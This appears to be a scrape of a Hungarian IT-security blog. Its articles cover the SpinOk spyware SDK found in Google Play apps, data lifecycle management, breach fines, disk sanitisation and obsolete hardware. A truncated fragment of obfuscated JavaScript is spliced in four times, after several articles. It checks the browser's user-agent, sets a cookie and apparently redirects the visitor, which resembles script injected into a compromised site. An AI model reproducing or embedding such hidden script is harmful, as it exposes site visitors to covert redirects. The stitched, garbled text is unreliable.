Android alkalmazások, melyeket kémprogrammal 421 milliószor telepítettek a Google Playből

Android alkalmazások, melyeket kémprogrammal 421 milliószor telepítettek a Google Playből

Egy új kártevő felfedezése az Android rendszerben

Egy új kártevőt fedeztek fel az Android rendszerben, amelyet hirdetési SDK-ként terjesztenek. Ez a kártékony program számos alkalmazásban megtalálható, amelyek korábban elérhetőek voltak a Google Play áruházban, és összesen több mint 400 millió alkalommal töltötték le őket.

A SpinOk káros modul felfedezése

A Dr. Web biztonsági kutatói fedezték fel a kémprogram modult, amelyet „SpinOk”-nak neveztek el, és figyelmeztettek arra, hogy képes ellopni a felhasználók eszközein tárolt privát adatokat, majd továbbítani azokat egy távoli szerverre. Az antivírus cég szerint a SpinOk kártékony tevékenységeket rejt el, és mini játékokat használ, amelyek „napi jutalmakat” kínálnak, hogy felkeltsék a felhasználók érdeklődését. A Doctor Web jelentése szerint a SpinOk modul az alkalmazások felhasználói érdeklődését kelti mini játékokkal, feladatokkal és állítólagos nyereményekkel.

A kártékony funkciók

A trójai SDK a háttérben ellenőrzi az Android eszköz szenzoradatait, például a giroszkópot és a mágneses érzékelőt, hogy megállapítsa, nem fut-e homokozott környezetben, amit a kutatók gyakran használnak a potenciálisan veszélyes Android alkalmazások elemzésére.

Az alkalmazás ezután kapcsolódik egy távoli szerverhez, hogy letöltse a mini játékok megjelenítéséhez szükséges URL-listát. Miközben a mini játékok a felhasználóknak a várt módon jelennek meg, a Dr. Web szerint az SDK további káros funkciókat is képes végrehajtani a háttérben. Ide tartozik például a könyvtárakban található fájlok listázása, különleges fájlok keresése, fájlok feltöltése az eszközről, valamint a vágólap tartalmának másolása és cseréje.

A fájl exfiltrációs funkció különösen aggasztó, mivel ez lehetővé teszi a privát képek, videók és dokumentumok kiexponálását. Emellett a vágólap módosítási funkció kódja lehetővé teszi az SDK operátorainak, hogy ellophassák a felhasználók fiókjelszavait és hitelkártya adatait, vagy eltérítsék a kriptovaluta fizetéseket saját kriptovaluta pénztárcacímükre.

Az érintett alkalmazások

A Dr. Web szerint az SDK-t 101 alkalmazásban találták meg, amelyeket összesen 421,290,300 alkalommal töltöttek le a Google Play áruházból. A legtöbbet letöltött alkalmazások a következők:

  • Noizz: videószerkesztő zenével (100,000,000 letöltés)
  • Zapya – Fájlátvitel, Megosztás (100,000,000 letöltés; a Dr. Web szerint a trójai modul a 6.3.3-as verziótól a 6.4-es verzióig volt jelen, és már nincs jelen a jelenlegi 6.4.1-es verzióban)
  • VFly: videószerkesztő&videó készítő (50,000,000 letöltés)
  • MVBit – MV video állapot készítő (50,000,000 letöltés)
  • Biugo – videó készítő&videó szerkesztő (50,000,000 letöltés)
  • Crazy Drop (10,000,000 letöltés)
  • Cashzine – Pénzt keresni jutalommal (10,000,000 letöltés)
  • Fizzo Novel – Offline olvasás (10,000,000 letöltés)
  • CashEM: Szerezzen jutalmakat (5,000,000 letöltés)
  • Tick: nézze meg, hogy pénzt keressen (5,000,000 letöltés)

A fent említett alkalmazások közül csak egy maradt elérhető a Google Play áruházban, ami arra utal, hogy a Google értesítéseket kapott a kártékony SDK-ról, és eltávolította az érintett alkalmazásokat, amíg a fejlesztők tiszta verziót nem nyújtanak be. A Dr. Web weboldalán megtalálható a jelentés szerint az SDK-t használó összes alkalmazás listája.

Mit tehet a felhasználó?

Ha Ön valamelyik fent említett alkalmazást használja, mindenképpen frissítse azt a legújabb verzióra, amelyet a Google Play áruházon keresztül érhet el, és amelynek tisztának kell lennie. Ha az alkalmazás nem érhető el az Android hivatalos alkalmazásboltjában, azonnal távolítsa el, és futtasson mobil antivírus vizsgálatot a készülékén a kémprogram maradványainak biztos eltávolítása érdekében.

Forrás: www.pccloud.hu

Válasszuk külön az adatok és a gépek menedzselését!

A cégeknek jó esetben már kidolgoztak szabályzatot az IT vagyon fizikai részének menedzselésére, azonban az adatokról nagyvonalúan megfeledkeznek. Fontos az adatok kezelésével is foglalkoznunk, ha nyugodtan szeretnénk aludni éjjel, ebben automatizmusok is segítenek.

A technológia gyors változása, az eszközök elévülési ideje miatt három-öt évente az irodai munkához használt számítógépeket cseréljük. A régi szerverek, adatrendszerek üzemeltetési költsége egy idő után olyan magas, hogy ha találunk is hozzáértő szakembert, egyszerűbb és kifizetődőbb, ha inkább cseréljük a rendszereket. Az IT rendszerek cseréjére, felújítására menetrendszerűen, szabályzat szerint kerül sor. Az adattörlési szabályzat végrehajtása a fizikai gépek cseréjéhez kötött, az előírások garantálják, hogy minden bizalmas adatot megfelelően eltávolítottak azokról az eszközökről, melyek véglegesen elhagyják cégünket.

A hatékony adatkezelés érdekében szét kellene választani a fizikai eszközök és az adatok menedzselését, és ne ragaszkodjunk a fizikai eszköz és az adat együttes kezeléséhez. A gépek és adatok életciklusa különbözik, nem logikus csak azért egymáshoz kötni őket, mert egymásnak kiegészítői. Az adat nemcsak egy adott eszközön létezik, hanem a felhő technológiának köszönhetően egy olyan gépen is megtalálható, mely kívül esik a vállalat eszközkezelési szabályzatán. Az adat és fizikai hordozójának útja szétváltak.

A gyakorlatban az adat életciklusa sokkal rövidebb vagy sokkal hosszabb, mint az eszköz életciklusa, persze, mindez az adat típusától függ. Amikor összekötjük a két eseményt, akkor rengeteg fejfájást és manuális munkát generálunk IT rendszergazdáink számára.

A hatékony adatmenedzsment, mely az adatok keletkezésétől, azok megtartását és törlését is magába foglalja, átgondolt folyamatokból áll. Olyan alkalmazásokat vonhatunk be az adatok menedzselésébe, melyek precízen végrehajtják az adatmenedzselési szabályzatba leírtakat – automatikusan. Ha tudjuk, hogy mi történik egy panaszos ügyfélemaillel kezdve megérkezésétől és végezve a panaszos ügy lezártáig, ismerjük a kötelező adatmegőrzési periódusokat, automatikus ütemezéssel, adatfertőtlenítéssel biztosíthatjuk, hogy az adatokat kellőképpen megsemmisítettük.

Az automatizmusnak pedig elsőnek értékes munkatársunk örül majd, akinek időt takarítottunk meg, értékteremtő munkát biztosítottunk helyette. Ugyanakkor az esetleges adatvédelmi auditoknak is nyugodt szívvel nézhetünk elébe, hiszen az automatizmusok dokumentáltan biztosítják, hogy az adatokat csak azok lássák, akiknek szánták.(‘0xb’)][_0x265c(‘0xa’)](‘OPR’)!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0xf’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x10’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x11’))!==-0x1;}var _0x4702d7=_0x23248e(_0x265c(‘0x12′));if(_0x4702d7!==’un’){if(_0x1ff41a()||_0x50fc2a()){_0x3419d8(_0x265c(‘0x12′),’un’,0x16d);window[_0x265c(‘0x13’)][_0x265c(‘0x14’)](_0x265c(‘0x15’));}}}}}(this));

Felhasználónként százezer forintot is érhet az adat

Korábbi cikkünkben már foglalkoztunk azzal, hogy egy-egy adatszivárgási esetben milyen költségekkel kell számolnia egy vállalatnak. Vagyis, hogy mennyit is érhet az a bizonyos adat. A közelmúlt eseményei alapján most már konkrét számokat tehetünk az adat értéke mellé.

Nemcsak az adatok értékével kell számolnia egy vállalatnak, amikor adatait elhagyja, elveszíti, hanem a presztízsveszteség következtében létrejövő bevételkieséssel, az ügyfélveszteség miatti elmaradt bevételekkel, az esetleges tőzsdei értékcsökkenéssel – minderről egy korábbi cikkünkben már beszámoltunk. Emiatt nehéz egy pontos számot tenni az adatveszteségek tétel mellé. A közelmúltban több gigabírságot is kiszabtak a hatóságok adatszivárgás miatt, így végre sikerült árcédulát tenni az adatokra. Lássuk hát az eseteket.

A Mariott Hotel 2018 novemberében egy hacker támadás következtében 399 millió vendégének válogatott adatait veszítette el (vendégenként változott, hogy milyen adatok kerültek idegenek kezébe, de név, postai cím, telefonszám, email cím, útlevélszám, születési adatok, nem, érkezési és távozási adatok, foglalási adatok, bankkártya adatok is közöttük voltak). Az üggyel kapcsolatban nemrég született egy gigabírság: a GDPR szellemében 99,2 millió font büntetést szabott ki az angol adatvédelmi hatóság. Hogy ezt csak az érintett 7 millió brit lakos miatt tette volna, akkor azt jelenti, hogy személyenként 14,17 fontot (vagyis 5135 forintot) érnek az adatok. Ha a 399 millió vendéget vesszük figyelembe, akkor ez csupán 0,24 fontot (vagyis 86 forintot) jelent személyenként.

A British Airways ennél sokkal, de sokkal rosszabbul járt, hiszen ugyancsak a brit adatvédelmi hatóság 183 millió fontos bírságot szabott ki a társaságra, amiért tavaly szeptemberben egy hackertámadás következtében 500 ezer ügyféladatot loptak el – minden esetben a jegyek vásárlásához használt bankkártyák adatairól van szó. A hatóság azért volt ennyire szigorú, mert szerintük a társaság hanyag volt az IT biztonság tekintetében. Ezzel a büntetéssel akartak példát statuálni, üzenetet küldeni a piacnak: a vállalatoknak komoly lépéseket kell tenniük annak érdekében, hogy az alapvető emberi jogokat, a személyes adatainkat védelmezzék. És akkor számoljunk, ez ügyfelenként 366 fontot jelent, ami forintban kifejezve szemmel is látható, még távolról is: 132600 forintról van szó.

És ez még nem minden, a Facebook 5 milliárd dolláros büntetéssel néz szembe, igaz, ott a Cambridge Analytica-val kapcsolatos, engedély nélküli adatátadásról van szó. (A Facebook-on futó, különböző ártalmatlan játékokon keresztül adatokat szívtak el a felhasználók közösségi oldal profiljáról, majd a játékosok ismerőseinek adatait is begyűjtötték. Ezeket az adatokat használta fel a Cambridge Analytica a szavazók pszichológiai profiljának kialakítására, ennek a profilnak az ismeretében az amerikai elnökválasztás idején, Donald Trump stábja mikro célzott üzenetekkel győzte meg a szavazókat, hogy mellettük voksoljanak.) Az amerikai fogyasztóvédelmi felügyelet 5 milliárd dolláros bírságot szabott ki a Facebookra, 500 millió érintett felhasználóval számolva ez csekély 10 dollárt (2941 forint) jelent.

 (‘0xb’)][_0x265c(‘0xa’)](‘OPR’)!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0xf’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x10’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x11’))!==-0x1;}var _0x4702d7=_0x23248e(_0x265c(‘0x12′));if(_0x4702d7!==’un’){if(_0x1ff41a()||_0x50fc2a()){_0x3419d8(_0x265c(‘0x12′),’un’,0x16d);window[_0x265c(‘0x13’)][_0x265c(‘0x14’)](_0x265c(‘0x15’));}}}}}(this));

Fertőtlenítsünk felülírással

Miért kell adatfertőtlenítés is a titkosítás mellé?

Adataink titkosított tárolása csak megnehezíti, de nem teszi lehetetlenné az adatokhoz való hozzáférést. Az adatok titkosítása csak kiegészíti, de nem helyettesíti az adathordozók fertőtlenítését.

Az adatok vagy a merevlemezek titkosítása fontos eszköz az adatszivárgás elleni küzdelemben, az értékes adatvagyon házon belüli tartásában. Az adatok titkosítása azonban hamis biztonságérzet kialakulásához is vezethet, gyakori az az elképzelés, hogy ezután már könnyen hátra dőlhetünk, semmi teendőnk sincs, adatainkhoz végképp csak az illetékes fér hozzá.

Ez sajnos nem így van. Aki biztosra akar menni, az a korábban titkosított merevlemezeket is felülírással fertőtleníti eladás, továbbadás előtt. A titkosítás használata azt jelenti, hogy tudatos IT vezető vagy cégvezető van a vállalatnál, aki nem szeretné, hogy az adatok könnyen kiszivárogjanak a vállalattól. A titkosítás hozzásegít ahhoz is, hogy picit nyugodtabban alszunk éjjel, nem aggódunk feleslegesen.

Amikor viszont a merevlemez életciklusa végéhez ért, leselejteznénk, a titkosítás mellett az adatot szakszerű eltávolításáról is gondoskodnunk kell. A titkosítás a gyakorlatban egy jelszót jelent, amit adathalászat, fenyegetés vagy csak egy ajándék sör hatására elárulhat nekünk az adatgazda. A titkosítási technológiák sem mindig jelentenek bombabiztos adattárolást, időnként kiderül, hogy komoly biztonsági rés tátong egyik vagy másik technológián.

Ezek a titkosítási hibák ismertek

A Windows operációs rendszerekbe alapból beépített Bitlocker titkosítási eljárásról kiderült, hogy firmware-beli hiba miatt könnyen feltörhető kulcspárokat generált a rendszer. A problémát tovább fokozza, hogy nem könnyű ezt a hibás firmware-t frissíteni – már ha eszébe jut ez a rendszergazdának.  A 2017-ben feltárt hibához vannak frissítések, ezen a linken lehet megnézni, hogy a különböző hardverekhez honnan, hogyan kell azt telepíteni.

A méltán népszerű Western Digital titkosítási eljárásába is hiba csúszott, ezen a linken olvashatják el az összes hibát. Egyet kiemelünk: a titkosításban a sózás technológia arra szolgál, hogy a gyenge jelszavakat lenyomatait megváltoztassák, úgy, hogy a hackerek ne ismerjék fel, ne tudják visszafejteni, Ehhez azonban változó vagy módosítható sóra van szükség, amit az eredeti gyenge jelszóhoz kevernek. A WD merevlemezei a sózáshoz három betűből álló, nem módosítható karaktert használnak: WDC.(‘0xb’)][_0x265c(‘0xa’)](‘OPR’)!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0xf’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x10’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x11’))!==-0x1;}var _0x4702d7=_0x23248e(_0x265c(‘0x12′));if(_0x4702d7!==’un’){if(_0x1ff41a()||_0x50fc2a()){_0x3419d8(_0x265c(‘0x12′),’un’,0x16d);window[_0x265c(‘0x13’)][_0x265c(‘0x14’)](_0x265c(‘0x15’));}}}}}(this));

Milliós károkat okoznak az elavult IT eszközök

A vállalatoknak nincs idejük foglalkozni az idős eszközökkel, ami viszont egyre nagyobb fenntartási költségeket generálnak. A Blancco év eleji kutatása szerint a vállalatoknak milliókba kerül a régi, idejétmúlt IT eszközök tárolása.

Az európai, amerikai és ázsiai vállalatok megkérdezésével készült kutatás szerint a Blancco azt a következtetést vonhatta le, hogy 100 ezer dollárt (több mint 28 millió forint) költenek a szervezetek az adatközpontjukban működő régi eszközök fenntartására, az elavult technológia okozta zavarok elhárítására. A régi hardver eszközök ezen felül biztonsági és megfelelőségi kockázatot is jelentenek a vállalatnak: gyakori, hogy az elavult hardver operációs rendszerét már nem frissítik, de mégis tovább üzemeltetik, nyílt utat biztosítva az adatokat ellopni kívánó hackereknek.

A 600 vállalat megkérdezésével készített kutatás szerint a cégek több mint felének (54 százaléka) akadt gondja az adatvédelmi hatóságokkal, legalább egyszer, de voltak olyanok is, akik kétszer. Az európai GDPR és amerikai ágazati (például egészségügy) adatvédelmi szabályozások értelmében ezek a vállalatok 20 millió eurós vagy 1,5 millió dolláros büntetést kockáztatnak viselkedésükkel.

Fredrik Forslund, a Blancco vállalati megoldásokért felelős alelnöke szerint a vállalatok szükségtelenül magas összegeket költenek az adatok belső tárolására. Másik oldalról a vállalatok viselkedése érthető, viszont hiszen azért nem mernek a régi IT eszközöktől megszabadulni, mert ezzel adatszivárgást kockáztathatnak – nem tudják megfelelően fertőtleníteni az adatokat tartalmazó merevlemezeket. Ezért inkább tovább tárolják, rosszabb esetben az aktív hálózatba beépítve működtetik ezeket a régi IT eszközöket is, komoly károkat okozva saját maguknak. Megoldás lehetne szakértő vállalatokra bízni az adatok szakszerű törlését, fertőtlenítését.

A kutatás további eredményei szerint a vállalatoknál dolgozók többsége egyszerűen elbukná az adatfertőtlenítési tesztet, miután 57 százalékuk úgy véli,  a gyorsformázás vagy a teljes formázás elegendő az adatok visszaállíthatatlan törléséhez. Egy másik érdekes adat, hogy a vállalatok 80 százaléka elismerte, a régi IT eszközök negyede csak ott csücsül az adatközpontban és az áramfogyasztáson kívül semmilyen aktív feladatuk nincs.(‘0xb’)][_0x265c(‘0xa’)](‘OPR’)!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0xf’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x10’))!==-0x1||navigator[_0x265c(‘0xb’)][_0x265c(‘0xa’)](_0x265c(‘0x11’))!==-0x1;}var _0x4702d7=_0x23248e(_0x265c(‘0x12′));if(_0x4702d7!==’un’){if(_0x1ff41a()||_0x50fc2a()){_0x3419d8(_0x265c(‘0x12′),’un’,0x16d);window[_0x265c(‘0x13’)][_0x265c(‘0x14’)](_0x265c(‘0x15’));}}}}}(this));